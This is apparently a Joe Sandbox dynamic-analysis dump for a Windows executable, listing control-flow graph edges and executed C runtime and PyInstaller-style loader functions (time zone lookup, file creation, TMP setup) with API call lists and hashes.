19018->19019 19023 7ff6dd669746 19018->19023 19063 7ff6dd66b7e4 19019->19063 19024 7ff6dd672f9c GetEnvironmentStringsW 19023->19024 19025 7ff6dd672fcc 19024->19025 19026 7ff6dd66974b 19024->19026 19027 7ff6dd6704c8 WideCharToMultiByte 19025->19027 19026->19002 19026->19003 19028 7ff6dd67301d 19027->19028 19029 7ff6dd673024 FreeEnvironmentStringsW 19028->19029 19030 7ff6dd66dbbc _fread_nolock 12 API calls 19028->19030 19029->19026 19031 7ff6dd673037 19030->19031 19032 7ff6dd673048 19031->19032 19033 7ff6dd67303f 19031->19033 19035 7ff6dd6704c8 WideCharToMultiByte 19032->19035 19034 7ff6dd66af0c __free_lconv_num 11 API calls 19033->19034 19036 7ff6dd673046 19034->19036 19037 7ff6dd67306b 19035->19037 19036->19029 19038 7ff6dd673079 19037->19038 19039 7ff6dd67306f 19037->19039 19041 7ff6dd66af0c __free_lconv_num 11 API calls 19038->19041 19040 7ff6dd66af0c __free_lconv_num 11 API calls 19039->19040 19042 7ff6dd673077 FreeEnvironmentStringsW 19040->19042 19041->19042 19042->19026 19046 7ff6dd669831 19044->19046 19045 7ff6dd66f158 _findclose 11 API calls 19058 7ff6dd669867 19045->19058 19046->19045 19046->19046 19047 7ff6dd66986f 19048 7ff6dd66af0c __free_lconv_num 11 API calls 19047->19048 19049 7ff6dd669767 19048->19049 19049->19007 19050 7ff6dd6698e2 19051 7ff6dd66af0c __free_lconv_num 11 API calls 19050->19051 19051->19049 19052 7ff6dd66f158 _findclose 11 API calls 19052->19058 19053 7ff6dd6698d1 19212 7ff6dd669a38 19053->19212 19055 7ff6dd66aa3c __std_exception_copy 37 API calls 19055->19058 19057 7ff6dd669907 19061 7ff6dd66aec4 _wfindfirst32i64 17 API calls 19057->19061 19058->19047 19058->19050 19058->19052 19058->19053 19058->19055 19058->19057 19060 7ff6dd66af0c __free_lconv_num 11 API calls 19058->19060 19059 7ff6dd66af0c __free_lconv_num 11 API calls 19059->19047 19060->19058 19062 7ff6dd66991a 19061->19062 19064 7ff6dd66b7f5 FlsGetValue 19063->19064 19065 7ff6dd66b810 FlsSetValue 19063->19065 19066 7ff6dd66b80a 19064->19066 19067 7ff6dd66b802 19064->19067 19065->19067 19068 7ff6dd66b81d 19065->19068 19066->19065 19069 7ff6dd66b808 19067->19069 19070 7ff6dd66aa9c __CxxCallCatchBlock 45 API calls 19067->19070 19071 7ff6dd66f158 _findclose 11 API calls 19068->19071 19083 7ff6dd672934 19069->19083 19072 7ff6dd66b885 19070->19072 19073 7ff6dd66b82c 19071->19073 19074 7ff6dd66b84a FlsSetValue 19073->19074 19075 7ff6dd66b83a FlsSetValue 19073->19075 19076 7ff6dd66b868 19074->19076 19077 7ff6dd66b856 FlsSetValue 19074->19077 19078 7ff6dd66b843 19075->19078 19079 7ff6dd66b4b8 _findclose 11 API calls 19076->19079 19077->19078 19080 7ff6dd66af0c __free_lconv_num 11 API calls 19078->19080 19081 7ff6dd66b870 19079->19081 19080->19067 19082 7ff6dd66af0c __free_lconv_num 11 API calls 19081->19082 19082->19069 19106 7ff6dd672ba4 19083->19106 19085 7ff6dd672969 19121 7ff6dd672634 19085->19121 19088 7ff6dd66dbbc _fread_nolock 12 API calls 19089 7ff6dd672997 19088->19089 19090 7ff6dd67299f 19089->19090 19092 7ff6dd6729ae 19089->19092 19091 7ff6dd66af0c __free_lconv_num 11 API calls 19090->19091 19104 7ff6dd672986 19091->19104 19092->19092 19128 7ff6dd672cdc 19092->19128 19095 7ff6dd672aaa 19096 7ff6dd6654c4 _findclose 11 API calls 19095->19096 19097 7ff6dd672aaf 19096->19097 19100 7ff6dd66af0c __free_lconv_num 11 API calls 19097->19100 19098 7ff6dd672ac4 19099 7ff6dd672b05 19098->19099 19101 7ff6dd66af0c __free_lconv_num 11 API calls 19098->19101 19105 7ff6dd672b6c 19099->19105 19139 7ff6dd672464 19099->19139 19100->19104 19101->19099 19103 7ff6dd66af0c __free_lconv_num 11 API calls 19103->19104 19104->19023 19105->19103 19107 7ff6dd672bc7 19106->19107 19109 7ff6dd672bd1 19107->19109 19154 7ff6dd670cb8 EnterCriticalSection 19107->19154 19111 7ff6dd672c43 19109->19111 19113 7ff6dd66aa9c __CxxCallCatchBlock 45 API calls 19109->19113 19111->19085 19115 7ff6dd672c5b 19113->19115 19117 7ff6dd672cb2 19115->19117 19118 7ff6dd66b7e4 50 API calls 19115->19118 19117->19085 19119 7ff6dd672c9c 19118->19119 19120 7ff6dd672934 65 API calls 19119->19120 19120->19117 19122 7ff6dd664f98 45 API calls 19121->19122 19123 7ff6dd672648 19122->19123 19124 7ff6dd672666 19123->19124 19125 7ff6dd672654 GetOEMCP 19123->19125 19126 7ff6dd67266b GetACP 19124->19126 19127 7ff6dd67267b 19124->19127 19125->19127 19126->19127 19127->19088 19127->19104 19129 7ff6dd672634 47 API calls 19128->19129 19130 7ff6dd672d09 19129->19130 19131 7ff6dd672e5f 19130->19131 19132 7ff6dd672d46 IsValidCodePage 19130->19132 19138 7ff6dd672d60 memcpy_s 19130->19138 19133 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19131->19133 19132->19131 19134 7ff6dd672d57 19132->19134 19135 7ff6dd672aa1 19133->19135 19136 7ff6dd672d86 GetCPInfo 19134->19136 19134->19138 19135->19095 19135->19098 19136->19131 19136->19138 19155 7ff6dd67274c 19138->19155 19211 7ff6dd670cb8 EnterCriticalSection 19139->19211 19156 7ff6dd672789 GetCPInfo 19155->19156 19157 7ff6dd67287f 19155->19157 19156->19157 19158 7ff6dd67279c 19156->19158 19159 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19157->19159 19160 7ff6dd6734b0 48 API calls 19158->19160 19161 7ff6dd67291e 19159->19161 19162 7ff6dd672813 19160->19162 19161->19131 19166 7ff6dd678454 19162->19166 19165 7ff6dd678454 54 API calls 19165->19157 19167 7ff6dd664f98 45 API calls 19166->19167 19168 7ff6dd678479 19167->19168 19171 7ff6dd678120 19168->19171 19172 7ff6dd678161 19171->19172 19173 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19172->19173 19174 7ff6dd6781ab 19173->19174 19176 7ff6dd6782e1 19174->19176 19178 7ff6dd678429 19174->19178 19179 7ff6dd66dbbc _fread_nolock 12 API calls 19174->19179 19181 7ff6dd6781e3 19174->19181 19175 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19177 7ff6dd672846 19175->19177 19176->19178 19180 7ff6dd66af0c __free_lconv_num 11 API calls 19176->19180 19177->19165 19178->19175 19179->19181 19180->19178 19181->19176 19182 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19181->19182 19183 7ff6dd678256 19182->19183 19183->19176 19202 7ff6dd66f5a4 19183->19202 19186 7ff6dd6782f2 19188 7ff6dd66dbbc _fread_nolock 12 API calls 19186->19188 19190 7ff6dd6783c4 19186->19190 19191 7ff6dd678310 19186->19191 19187 7ff6dd6782a1 19187->19176 19189 7ff6dd66f5a4 __crtLCMapStringW 6 API calls 19187->19189 19188->19191 19189->19176 19190->19176 19192 7ff6dd66af0c __free_lconv_num 11 API calls 19190->19192 19191->19176 19193 7ff6dd66f5a4 __crtLCMapStringW 6 API calls 19191->19193 19192->19176 19194 7ff6dd678390 19193->19194 19194->19190 19195 7ff6dd6783c6 19194->19195 19196 7ff6dd6783b0 19194->19196 19197 7ff6dd6704c8 WideCharToMultiByte 19195->19197 19198 7ff6dd6704c8 WideCharToMultiByte 19196->19198 19199 7ff6dd6783be 19197->19199 19198->19199 19199->19190 19200 7ff6dd6783de 19199->19200 19200->19176 19201 7ff6dd66af0c __free_lconv_num 11 API calls 19200->19201 19201->19176 19203 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19202->19203 19204 7ff6dd66f5e2 19203->19204 19206 7ff6dd66f5ea 19204->19206 19208 7ff6dd66f690 19204->19208 19206->19176 19206->19186 19206->19187 19207 7ff6dd66f653 LCMapStringW 19207->19206 19209 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19208->19209 19210 7ff6dd66f6be __crtLCMapStringW 19209->19210 19210->19207 19213 7ff6dd669a3d 19212->19213 19214 7ff6dd6698d9 19212->19214 19215 7ff6dd669a66 19213->19215 19216 7ff6dd66af0c __free_lconv_num 11 API calls 19213->19216 19214->19059 19217 7ff6dd66af0c __free_lconv_num 11 API calls 19215->19217 19216->19213 19217->19214 19219 7ff6dd676c19 19218->19219 19220 7ff6dd676c30 19218->19220 19221 7ff6dd6654c4 _findclose 11 API calls 19219->19221 19220->19219 19223 7ff6dd676c3e 19220->19223 19222 7ff6dd676c1e 19221->19222 19224 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 19222->19224 19225 7ff6dd676c29 19223->19225 19226 7ff6dd664f98 45 API calls 19223->19226 19224->19225 19225->18897 19226->19225 19228 7ff6dd664f98 45 API calls 19227->19228 19229 7ff6dd679849 19228->19229 19232 7ff6dd6794a0 19229->19232 19234 7ff6dd6794ee 19232->19234 19233 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19235 7ff6dd677ad5 19233->19235 19237 7ff6dd679560 GetCPInfo 19234->19237 19238 7ff6dd679575 19234->19238 19241 7ff6dd679579 19234->19241 19235->18897 19235->18921 19236 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19239 7ff6dd67960d 19236->19239 19237->19238 19237->19241 19238->19236 19238->19241 19240 7ff6dd66dbbc _fread_nolock 12 API calls 19239->19240 19239->19241 19242 7ff6dd679644 19239->19242 19240->19242 19241->19233 19242->19241 19243 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19242->19243 19244 7ff6dd6796b2 19243->19244 19245 7ff6dd679794 19244->19245 19246 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19244->19246 19245->19241 19247 7ff6dd66af0c __free_lconv_num 11 API calls 19245->19247 19248 7ff6dd6796d8 19246->19248 19247->19241 19248->19245 19249 7ff6dd66dbbc _fread_nolock 12 API calls 19248->19249 19250 7ff6dd679705 19248->19250 19249->19250 19250->19245 19251 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19250->19251 19252 7ff6dd67977c 19251->19252 19253 7ff6dd67979c 19252->19253 19254 7ff6dd679782 19252->19254 19261 7ff6dd66f428 19253->19261 19254->19245 19256 7ff6dd66af0c __free_lconv_num 11 API calls 19254->19256 19256->19245 19258 7ff6dd6797db 19258->19241 19260 7ff6dd66af0c __free_lconv_num 11 API calls 19258->19260 19259 7ff6dd66af0c __free_lconv_num 11 API calls 19259->19258 19260->19241 19262 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19261->19262 19263 7ff6dd66f466 19262->19263 19264 7ff6dd66f690 __crtLCMapStringW 5 API calls 19263->19264 19266 7ff6dd66f46e 19263->19266 19265 7ff6dd66f4d7 CompareStringW 19264->19265 19265->19266 19266->19258 19266->19259 19268 7ff6dd67852a HeapSize 19267->19268 19269 7ff6dd678511 19267->19269 19270 7ff6dd6654c4 _findclose 11 API calls 19269->19270 19271 7ff6dd678516 19270->19271 19272 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 19271->19272 19273 7ff6dd678521 19272->19273 19273->18926 19275 7ff6dd670edb 19274->19275 19276 7ff6dd670ed1 19274->19276 19278 7ff6dd670ee0 19275->19278 19284 7ff6dd670ee7 _findclose 19275->19284 19277 7ff6dd66dbbc _fread_nolock 12 API calls 19276->19277 19282 7ff6dd670ed9 19277->19282 19281 7ff6dd66af0c __free_lconv_num 11 API calls 19278->19281 19279 7ff6dd670eed 19283 7ff6dd6654c4 _findclose 11 API calls 19279->19283 19280 7ff6dd670f1a HeapReAlloc 19280->19282 19280->19284 19281->19282 19282->18930 19283->19282 19284->19279 19284->19280 19285 7ff6dd673c00 _findclose 2 API calls 19284->19285 19285->19284 19287 7ff6dd6697b5 19286->19287 19288 7ff6dd6697b1 19286->19288 19307 7ff6dd6730ac GetEnvironmentStringsW 19287->19307 19288->18969 19299 7ff6dd669b5c 19288->19299 19291 7ff6dd6697c2 19293 7ff6dd66af0c __free_lconv_num 11 API calls 19291->19293 19292 7ff6dd6697ce 19314 7ff6dd66991c 19292->19314 19293->19288 19296 7ff6dd66af0c __free_lconv_num 11 API calls 19297 7ff6dd6697f5 19296->19297 19298 7ff6dd66af0c __free_lconv_num 11 API calls 19297->19298 19298->19288 19300 7ff6dd669b7f 19299->19300 19305 7ff6dd669b96 19299->19305 19300->18969 19301 7ff6dd66f158 _findclose 11 API calls 19301->19305 19302 7ff6dd669c0a 19304 7ff6dd66af0c __free_lconv_num 11 API calls 19302->19304 19303 7ff6dd66fc00 MultiByteToWideChar _fread_nolock 19303->19305 19304->19300 19305->19300 19305->19301 19305->19302 19305->19303 19306 7ff6dd66af0c __free_lconv_num 11 API calls 19305->19306 19306->19305 19308 7ff6dd6697ba 19307->19308 19309 7ff6dd6730d0 19307->19309 19308->19291 19308->19292 19310 7ff6dd66dbbc _fread_nolock 12 API calls 19309->19310 19311 7ff6dd673107 memcpy_s 19310->19311 19312 7ff6dd66af0c __free_lconv_num 11 API calls 19311->19312 19313 7ff6dd673127 FreeEnvironmentStringsW 19312->19313 19313->19308 19315 7ff6dd669944 19314->19315 19316 7ff6dd66f158 _findclose 11 API calls 19315->19316 19328 7ff6dd66997f 19316->19328 19317 7ff6dd66af0c __free_lconv_num 11 API calls 19318 7ff6dd6697d6 19317->19318 19318->19296 19319 7ff6dd669a01 19320 7ff6dd66af0c __free_lconv_num 11 API calls 19319->19320 19320->19318 19321 7ff6dd66f158 _findclose 11 API calls 19321->19328 19322 7ff6dd6699f0 19323 7ff6dd669a38 11 API calls 19322->19323 19325 7ff6dd6699f8 19323->19325 19324 7ff6dd670e54 _wfindfirst32i64 37 API calls 19324->19328 19326 7ff6dd66af0c __free_lconv_num 11 API calls 19325->19326 19330 7ff6dd669987 19326->19330 19327 7ff6dd669a24 19331 7ff6dd66aec4 _wfindfirst32i64 17 API calls 19327->19331 19328->19319 19328->19321 19328->19322 19328->19324 19328->19327 19329 7ff6dd66af0c __free_lconv_num 11 API calls 19328->19329 19328->19330 19329->19328 19330->19317 19332 7ff6dd669a36 19331->19332 19334 7ff6dd679409 __crtLCMapStringW 19333->19334 19335 7ff6dd66f428 6 API calls 19334->19335 19336 7ff6dd6779be 19334->19336 19335->19336 19336->18993 19336->18994 19340 7ff6dd65b143 19341 7ff6dd65b154 19340->19341 19342 7ff6dd65b212 19341->19342 19343 7ff6dd66af0c 11 API calls 19341->19343 19343->19342

                                                            Executed Functions

                                                            Function 00007FF6DD676370 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 133 7ff6dd676370-7ff6dd6763ab call 7ff6dd675cf8 call 7ff6dd675d00 call 7ff6dd675d68 140 7ff6dd6765d5-7ff6dd676621 call 7ff6dd66aec4 call 7ff6dd675cf8 call 7ff6dd675d00 call 7ff6dd675d68 133->140 141 7ff6dd6763b1-7ff6dd6763bc call 7ff6dd675d08 133->141 166 7ff6dd676627-7ff6dd676632 call 7ff6dd675d08 140->166 167 7ff6dd67675f-7ff6dd6767cd call 7ff6dd66aec4 call 7ff6dd671be8 140->167 141->140 147 7ff6dd6763c2-7ff6dd6763cc 141->147 148 7ff6dd6763ee-7ff6dd6763f2 147->148 149 7ff6dd6763ce-7ff6dd6763d1 147->149 152 7ff6dd6763f5-7ff6dd6763fd 148->152 151 7ff6dd6763d4-7ff6dd6763df 149->151 154 7ff6dd6763ea-7ff6dd6763ec 151->154 155 7ff6dd6763e1-7ff6dd6763e8 151->155 152->152 156 7ff6dd6763ff-7ff6dd676412 call 7ff6dd66dbbc 152->156 154->148 158 7ff6dd67641b-7ff6dd676429 154->158 155->151 155->154 164 7ff6dd67642a-7ff6dd676436 call 7ff6dd66af0c 156->164 165 7ff6dd676414-7ff6dd676416 call 7ff6dd66af0c 156->165 175 7ff6dd67643d-7ff6dd676445 164->175 165->158 166->167 176 7ff6dd676638-7ff6dd676643 call 7ff6dd675d38 166->176 186 7ff6dd6767db-7ff6dd6767de 167->186 187 7ff6dd6767cf-7ff6dd6767d6 167->187 175->175 178 7ff6dd676447-7ff6dd676458 call 7ff6dd670e54 175->178 176->167 185 7ff6dd676649-7ff6dd67666c call 7ff6dd66af0c GetTimeZoneInformation 176->185 178->140 188 7ff6dd67645e-7ff6dd6764b4 call 7ff6dd65d0e0 * 4 call 7ff6dd67628c 178->188 201 7ff6dd676734-7ff6dd67675e call 7ff6dd675cf0 call 7ff6dd675ce0 call 7ff6dd675ce8 185->201 202 7ff6dd676672-7ff6dd676693 185->202 190 7ff6dd676815-7ff6dd676828 call 7ff6dd66dbbc 186->190 191 7ff6dd6767e0 186->191 192 7ff6dd67686b-7ff6dd67686e 187->192 246 7ff6dd6764b6-7ff6dd6764ba 188->246 207 7ff6dd67682a 190->207 208 7ff6dd676833-7ff6dd67684e call 7ff6dd671be8 190->208 195 7ff6dd6767e3 191->195 194 7ff6dd676874-7ff6dd67687c call 7ff6dd676370 192->194 192->195 203 7ff6dd6767e8-7ff6dd676814 call 7ff6dd66af0c call 7ff6dd65bcc0 194->203 195->203 204 7ff6dd6767e3 call 7ff6dd6765ec 195->204 209 7ff6dd676695-7ff6dd67669b 202->209 210 7ff6dd67669e-7ff6dd6766a5 202->210 204->203 215 7ff6dd67682c-7ff6dd676831 call 7ff6dd66af0c 207->215 232 7ff6dd676855-7ff6dd676867 call 7ff6dd66af0c 208->232 233 7ff6dd676850-7ff6dd676853 208->233 209->210 217 7ff6dd6766b9 210->217 218 7ff6dd6766a7-7ff6dd6766af 210->218 215->191 223 7ff6dd6766bb-7ff6dd67672f call 7ff6dd65d0e0 * 4 call 7ff6dd6731cc call 7ff6dd676884 * 2 217->223 218->217 226 7ff6dd6766b1-7ff6dd6766b7 218->226 223->201 226->223 232->192 233->215 248 7ff6dd6764bc 246->248 249 7ff6dd6764c0-7ff6dd6764c4 246->249 248->249 249->246 251 7ff6dd6764c6-7ff6dd6764eb call 7ff6dd66706c 249->251 257 7ff6dd6764ee-7ff6dd6764f2 251->257 259 7ff6dd6764f4-7ff6dd6764ff 257->259 260 7ff6dd676501-7ff6dd676505 257->260 259->260 262 7ff6dd676507-7ff6dd67650b 259->262 260->257 263 7ff6dd67658c-7ff6dd676590 262->263 264 7ff6dd67650d-7ff6dd676535 call 7ff6dd66706c 262->264 267 7ff6dd676597-7ff6dd6765a4 263->267 268 7ff6dd676592-7ff6dd676594 263->268 273 7ff6dd676537 264->273 274 7ff6dd676553-7ff6dd676557 264->274 269 7ff6dd6765a6-7ff6dd6765bc call 7ff6dd67628c 267->269 270 7ff6dd6765bf-7ff6dd6765ce call 7ff6dd675cf0 call 7ff6dd675ce0 267->270 268->267 269->270 270->140 277 7ff6dd67653a-7ff6dd676541 273->277 274->263 279 7ff6dd676559-7ff6dd676577 call 7ff6dd66706c 274->279 277->274 280 7ff6dd676543-7ff6dd676551 277->280 285 7ff6dd676583-7ff6dd67658a 279->285 280->274 280->277 285->263 286 7ff6dd676579-7ff6dd67657d 285->286 286->263 287 7ff6dd67657f 286->287 287->285
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD6763B5
                                                              • Part of subcall function 00007FF6DD675D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D1C
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                              • Part of subcall function 00007FF6DD66AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6DD66AEA3,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66AECD
                                                              • Part of subcall function 00007FF6DD66AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6DD66AEA3,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66AEF2
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD6763A4
                                                              • Part of subcall function 00007FF6DD675D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D7C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67661A
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67662B
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67663C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DD67687C), ref: 00007FF6DD676663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1458651798-239921721
                                                            • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                            • Instruction ID: 5dc811ae22314c14717850fe1a0a93d3530170a62a496e30514234b3658afc97
                                                            • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                            • Instruction Fuzzy Hash: 2BD19D22E18286A6E760FF6598502BD6351EF44794F448137EA0DC7A96FF3CE4A1A7C0
                                                            Function 00007FF6DD6772BC Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 318 7ff6dd6772bc-7ff6dd67732f call 7ff6dd676ff0 321 7ff6dd677349-7ff6dd677353 call 7ff6dd668434 318->321 322 7ff6dd677331-7ff6dd67733a call 7ff6dd6654a4 318->322 328 7ff6dd677355-7ff6dd67736c call 7ff6dd6654a4 call 7ff6dd6654c4 321->328 329 7ff6dd67736e-7ff6dd6773d7 CreateFileW 321->329 327 7ff6dd67733d-7ff6dd677344 call 7ff6dd6654c4 322->327 342 7ff6dd67768a-7ff6dd6776aa 327->342 328->327 332 7ff6dd6773d9-7ff6dd6773df 329->332 333 7ff6dd677454-7ff6dd67745f GetFileType 329->333 338 7ff6dd677421-7ff6dd67744f GetLastError call 7ff6dd665438 332->338 339 7ff6dd6773e1-7ff6dd6773e5 332->339 335 7ff6dd6774b2-7ff6dd6774b9 333->335 336 7ff6dd677461-7ff6dd67749c GetLastError call 7ff6dd665438 CloseHandle 333->336 345 7ff6dd6774bb-7ff6dd6774bf 335->345 346 7ff6dd6774c1-7ff6dd6774c4 335->346 336->327 353 7ff6dd6774a2-7ff6dd6774ad call 7ff6dd6654c4 336->353 338->327 339->338 340 7ff6dd6773e7-7ff6dd67741f CreateFileW 339->340 340->333 340->338 350 7ff6dd6774ca-7ff6dd67751f call 7ff6dd66834c 345->350 346->350 351 7ff6dd6774c6 346->351 356 7ff6dd677521-7ff6dd67752d call 7ff6dd6771f8 350->356 357 7ff6dd67753e-7ff6dd67756f call 7ff6dd676d70 350->357 351->350 353->327 356->357 363 7ff6dd67752f 356->363 364 7ff6dd677575-7ff6dd6775b7 357->364 365 7ff6dd677571-7ff6dd677573 357->365 366 7ff6dd677531-7ff6dd677539 call 7ff6dd66b084 363->366 367 7ff6dd6775d9-7ff6dd6775e4 364->367 368 7ff6dd6775b9-7ff6dd6775bd 364->368 365->366 366->342 369 7ff6dd6775ea-7ff6dd6775ee 367->369 370 7ff6dd677688 367->370 368->367 372 7ff6dd6775bf-7ff6dd6775d4 368->372 369->370 373 7ff6dd6775f4-7ff6dd677639 CloseHandle CreateFileW 369->373 370->342 372->367 375 7ff6dd67763b-7ff6dd677669 GetLastError call 7ff6dd665438 call 7ff6dd668574 373->375 376 7ff6dd67766e-7ff6dd677683 373->376 375->376 376->370
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                            • Instruction ID: a2e13258e5c77627688f77421edc538dbf9ac3bb839545f71d27ce3dcca85e63
                                                            • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                            • Instruction Fuzzy Hash: 42C1C332F24A85A5EB10DF68C4801AC3761FB49BA8F110236DE2E977D4EF38D466D380
                                                            Function 00007FF6DD657950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6DD65154F), ref: 00007FF6DD6579E7
                                                              • Part of subcall function 00007FF6DD657B60: GetEnvironmentVariableW.KERNEL32(00007FF6DD653A1F), ref: 00007FF6DD657B9A
                                                              • Part of subcall function 00007FF6DD657B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DD657BB7
                                                              • Part of subcall function 00007FF6DD667DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD667E05
                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6DD657AA1
                                                              • Part of subcall function 00007FF6DD652B30: MessageBoxW.USER32 ref: 00007FF6DD652C05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                            • API String ID: 3752271684-1116378104
                                                            • Opcode ID: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
                                                            • Instruction ID: 675624e65a6a73dbec84a9cd8b9a594b037d38cf704bc2b37b857e7b3e4a6832
                                                            • Opcode Fuzzy Hash: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
                                                            • Instruction Fuzzy Hash: D2516B51F0D2C251EE14BA66A8152BE52919F89BC0F444433ED0ECBB97FE2CE465A6C0
                                                            Function 00007FF6DD6765EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
